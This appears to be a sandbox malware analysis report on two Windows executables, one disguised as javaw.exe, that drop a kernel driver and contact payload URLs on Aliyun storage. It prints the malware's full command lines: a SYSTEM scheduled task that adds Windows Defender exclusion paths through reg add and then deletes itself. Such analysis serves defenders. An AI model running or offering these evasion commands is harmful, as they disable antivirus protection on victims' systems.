Source: lSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: lSQb8c.exe, 00000005.00000002.3256280363.0000000000141000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014B000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.0000000000146000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/b
Source: lSQb8c.exe, 00000005.00000002.3256280363.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
Source: lSQb8c.exe, 00000005.00000002.3256280363.0000000000138000.00000004.00000010.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256585622.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat
Source: lSQb8c.exe, 00000005.00000002.3256439510.000000000052F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003
Source: lSQb8c.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: lSQb8c.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: lSQb8c.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: lSQb8c.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-c
Source: 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/
Source: 23567791246-764698008.02.exe, 00000000.00000003.2882892555.00000000005B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com//
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/7-2476756634-1003p
Source: 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.gif
Source: 23567791246-764698008.02.exe, 00000000.00000003.2956301436.000000000061E000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/a.gifhttps://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gif
Source: 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/b.gifT
Source: 23567791246-764698008.02.exe, 00000000.00000003.2956301436.000000000061E000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/c.gif
Source: 23567791246-764698008.02.exe, 00000000.00000003.2956301436.000000000061E000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2901773716.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, 23567791246-764698008.02.exe, 00000000.00000003.2882839303.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yuqi7x.oss-cn-beijing.aliyuncs.com/d.gif
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownHTTPS traffic detected: 39.103.20.93:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.5:49984 version: TLS 1.2

System Summary

barindex
Source: 5.2.lSQb8c.exe.2920000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 4.2.lSQb8c.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140006C95 NtAllocateVirtualMemory,4_2_0000000140006C95
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000C3F04_2_000000014000C3F0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000CC004_2_000000014000CC00
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140001A304_2_0000000140001A30
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000C2A04_2_000000014000C2A0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400022C04_2_00000001400022C0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400110F04_2_00000001400110F0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140010CF04_2_0000000140010CF0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400093004_2_0000000140009300
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000BB704_2_000000014000BB70
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140003F804_2_0000000140003F80
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400103D04_2_00000001400103D0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFB002484_2_00007FF8BFB00248
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAFA1B84_2_00007FF8BFAFA1B8
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02923CA05_2_02923CA0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029292805_2_02929280
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0294E2AD5_2_0294E2AD
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029282C05_2_029282C0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0292C23C5_2_0292C23C
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029310FC5_2_029310FC
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02A3F8285_2_02A3F828
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0295C97C5_2_0295C97C
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0292C6D05_2_0292C6D0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029286C85_2_029286C8
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029284C45_2_029284C4
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02930C605_2_02930C60
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02928D785_2_02928D78
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0056C9C55_2_0056C9C5
Source: 23567791246-764698008.02.exe, 00000000.00000000.2012647656.0000000141D87000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejavaw.exeL vs 23567791246-764698008.02.exe
Source: 23567791246-764698008.02.exeBinary or memory string: OriginalFilenamejavaw.exeL vs 23567791246-764698008.02.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 5.2.lSQb8c.exe.2920000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 4.2.lSQb8c.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.evad.winEXE@55/17@2/2
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80
Source: C:\Users\user\Documents\lSQb8c.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0000000140001430
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_029218A0 CreateToolhelp32Snapshot,Process32First,Process32Next,SleepEx,CreateToolhelp32Snapshot,5_2_029218A0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520
Source: C:\Users\user\Documents\lSQb8c.exeFile created: C:\Program Files (x86)\szbGonJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].datJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
Source: C:\Users\user\Documents\lSQb8c.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: 23567791246-764698008.02.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\lSQb8c.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 23567791246-764698008.02.exeVirustotal: Detection: 12%
Source: 23567791246-764698008.02.exeString found in binary or memory: -help
Source: 23567791246-764698008.02.exeString found in binary or memory: sun/launcher/LauncherHelper
Source: 23567791246-764698008.02.exeString found in binary or memory: %s%d%s%d=%s-XX:NativeMemoryTracking=-X-jar-?-help-fullversion-version-classpath-cp-Xms-Xmx-Xss option[%2d] = '%s'
Source: 23567791246-764698008.02.exeString found in binary or memory: Error: A JNI error has occurred, please check your installation and try againsun/launcher/LauncherHelpermakePlatformString(Z[B)Ljava/lang/String;java/lang/String----%s----
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile read: C:\Users\user\Desktop\23567791246-764698008.02.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\23567791246-764698008.02.exe "C:\Users\user\Desktop\23567791246-764698008.02.exe"
Source: unknownProcess created: C:\Users\user\Documents\lSQb8c.exe C:\Users\user\Documents\lSQb8c.exe
Source: unknownProcess created: C:\Users\user\Documents\lSQb8c.exe C:\Users\user\Documents\lSQb8c.exe
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: hid.dllJump to behavior
